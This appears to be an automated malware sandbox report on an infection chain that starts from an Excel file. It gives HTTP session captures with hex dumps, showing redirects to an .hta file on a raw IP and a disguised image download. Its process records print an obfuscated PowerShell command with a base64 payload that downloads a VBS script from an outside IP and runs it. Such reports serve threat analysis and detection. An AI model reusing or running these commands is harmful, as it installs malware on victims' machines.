                                                                                            Connection: close
                                                                                            2024-12-10 05:57:48 UTC125INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 34 32 2e 36 30 2f 34 36 36 2f 77 63 63 2f 6d 61 74 63 68 69 6e 67 77 69 74 68 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 66 6f 72 65 6e 74 69 72 65 6c 69 66 65 67 69 76 65 6e 6d 65 62 65 73 74 74 68 69 67 6e 73 65 76 65 72 67 69 76 65 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.224916954.150.207.1314433312C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-10 05:58:07 UTC405OUTGET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-10 05:58:07 UTC505INHTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:58:07 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
                                                                                            Connection: close
                                                                                            2024-12-10 05:58:07 UTC125INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 34 32 2e 36 30 2f 34 36 36 2f 77 63 63 2f 6d 61 74 63 68 69 6e 67 77 69 74 68 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 66 6f 72 65 6e 74 69 72 65 6c 69 66 65 67 69 76 65 6e 6d 65 62 65 73 74 74 68 69 67 6e 73 65 76 65 72 67 69 76 65 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.224917254.150.207.1314431972C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-10 05:58:11 UTC429OUTGET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: short.ruksk.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-10 05:58:11 UTC505INHTTP/1.1 302 Found
                                                                                            Date: Tue, 10 Dec 2024 05:58:11 GMT
                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                            X-DNS-Prefetch-Control: off
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                            X-Download-Options: noopen
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 0
                                                                                            Location: http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
                                                                                            Vary: Accept
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 125
                                                                                            Connection: close
                                                                                            2024-12-10 05:58:11 UTC125INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 34 32 2e 36 30 2f 34 36 36 2f 77 63 63 2f 6d 61 74 63 68 69 6e 67 77 69 74 68 62 65 73 74 74 68 69 6e 67 73 74 6f 62 65 67 72 65 61 74 66 6f 72 65 6e 74 69 72 65 6c 69 66 65 67 69 76 65 6e 6d 65 62 65 73 74 74 68 69 67 6e 73 65 76 65 72 67 69 76 65 2e 68 74 61
                                                                                            Data Ascii: Found. Redirecting to http://172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.2249174151.101.1.1374433832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-10 05:58:28 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                            Host: res.cloudinary.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-10 05:58:29 UTC754INHTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 2230233
                                                                                            Content-Type: image/jpeg
                                                                                            Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                            Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                            Date: Tue, 10 Dec 2024 05:58:29 GMT
                                                                                            Strict-Transport-Security: max-age=604800
                                                                                            Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                            Server-Timing: cld-fastly;dur=121;cpu=120;start=2024-12-10T05:58:29.181Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
                                                                                            Server: Cloudinary
                                                                                            Timing-Allow-Origin: *
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Accept-Ranges: bytes
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                            x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                            Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                            Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                            Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                            Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                            Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                            Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                            Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                            Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                            2024-12-10 05:58:29 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                            Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:00:57:19
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                            Imagebase:0x13fb50000
                                                                                            File size:28'253'536 bytes
                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:00:57:44
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                            Imagebase:0x13f9a0000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:00:57:50
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x4acc0000
                                                                                            File size:345'088 bytes
                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:00:57:50
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBE